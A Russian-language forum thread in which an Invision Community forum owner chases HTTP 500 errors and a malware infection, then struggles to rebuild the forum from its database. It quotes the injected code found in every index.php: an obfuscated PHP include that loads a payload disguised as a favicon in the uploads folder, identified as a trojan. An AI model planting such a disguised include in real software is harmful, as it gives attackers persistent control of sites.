error 500 при вызове страницы "непрочитанный контент"

[Karagor]

В какой-то момент перестала вызываться страница "непрочитанный контент".

Полез пытаться разобраться и первое на что наткнулся это добавка во всех индексах:

<?php
/*acedb*/

@include "\x2fvar\x2fwww\x2fkar\x61gor\x2fdat\x61/ww\x77/sp\x6frt-\x68ors\x65.pr\x6f/up\x6coad\x73/ga\x6cler\x79/al\x62um_\x3337/\x66avi\x63on_\x31da2\x668.i\x63o";

/*acedb*/
/**
 * @brief		Public bootstrap
 * @author		<a href='https://www.invisioncommunity.com'>Invision Power Services, Inc.</a>
 * @copyright	(c) Invision Power Services, Inc.
 * @license		https://www.invisioncommunity.com/legal/standards/
 * @package		Invision Community
 * @since		18 Feb 2013
 */
$_SERVER['SCRIPT_FILENAME']	= __FILE__;
require_once 'init.php';
\IPS\Dispatcher\Front::i()->run();

Что это такое? 

[Karagor]

дкодировал, инклюда ведет 

@include "/var/www/karagor/data/www/sport-horse.pro/uploads/gallery/album_337/favicon_1da2f8.ico";

и выяснилось, что это троян PHP/Kryptik.BC

 

[Karagor]

Как хрень эту выковыривать-то... Есть у кого-нибудь опыт?

[Cheshir]

Скачайте полностью на комп, скачайте Notepad++, и удалите из всех файлов при помощи поиска/замены в файлах, потом замените на сайте... Не понятно, как умудрились схватить, хтмл для пользователей разрешен? слабенький хостинг и инъекцию сделали?

[Karagor]

Стоял 3.4 сначала - началось еще на нем, думал все вычистил.

[Cheshir]

vps?

[Karagor]

firstvds и да vps

Короче кривыми руками снес на сервере папку с форумом... , что-то тупею с годами... (((

Пытаюсь поднять заново - ставлю чистый новый с тестовой базой, подменяю базу - и теряю полностью стиль.

Можно зайти на форум посмотреть что там видно... как это лечить-то?

[Respected]

При обновлении на 4.x файлы заменяются, в том числе и на index.php

2 минуты назад, Karagor сказал:

как это лечить-то?

Установить правильные права на директории. 

[Karagor]

индексы-то теперь чистые - только дизайн форум потерял

я в трешке как-то еще разбирался - а тут как баран покачто

так с новой базой все работает, а со старой нет

по логике в базе самой есть какие-то пути и они не совпадают

база конвертированная из трешки

 

[Cheshir]

21 минуту назад, Karagor сказал:

vps

Проверьте сервак на вирусы, походу скрипт пишет какой-то, если еще на нем есть домены, посмотрите, есть ли в них такая же зараза.

[Karagor]

запустил проверку... 

с тестовой базой теперь тоже не работает... 

[Karagor]

Антивирус на vps какой-то странный, что-то он там то ли делал, то ли нет...

Вобщем в сухом остатке у меня есть база из которой форум виден без дизайна.

Сам починить не могу - знаний и понимания не хватает. 

Может кто-то помочь? 

[WOLF]

установить с нуля форум, перенести необходимые таблицы с пользователями и темами, и дальше настроить все как было раньше

[Karagor]

Логически это понятно, а вот практически не очень

Например в таблице core_members в чистой базе 93 поля, а в рабочей 97

и хрен его знает почему... 

[Karagor]

Кстати на вирусы таки сервер проверил - угроз не обнаружено

[Cheshir]

9 минут назад, Karagor сказал:

Кстати на вирусы таки сервер проверил - угроз не обнаружено

сайты на серваке еще есть? Проверьте их на наличие похожего кода, если есть и на других сайтах, то 100% вирус на сервере, и то, чем вы проверяете просто напросто не эффективно.

[Karagor]

Так получилось, что я снес все файлы - только база осталась, я же писал.

Так что если вирус не мог приползти из базы, то фалов нет.

а в какой таблице хранятся разделы форума? никак не пойму

[Karagor]

переношу таблицы в чистый форум

перенеc core_members, forums_

удалось зайти в админку, но список пользователей не показывает нормально, как и список форумов... 

порядок действий не ясен вобщем

[WOLF]

1 час назад, Karagor сказал:

переношу таблицы в чистый форум

перенеc core_members, forums_

удалось зайти в админку, но список пользователей не показывает нормально, как и список форумов... 

порядок действий не ясен вобщем

вам же вроде предложили уже помощь на другом форуме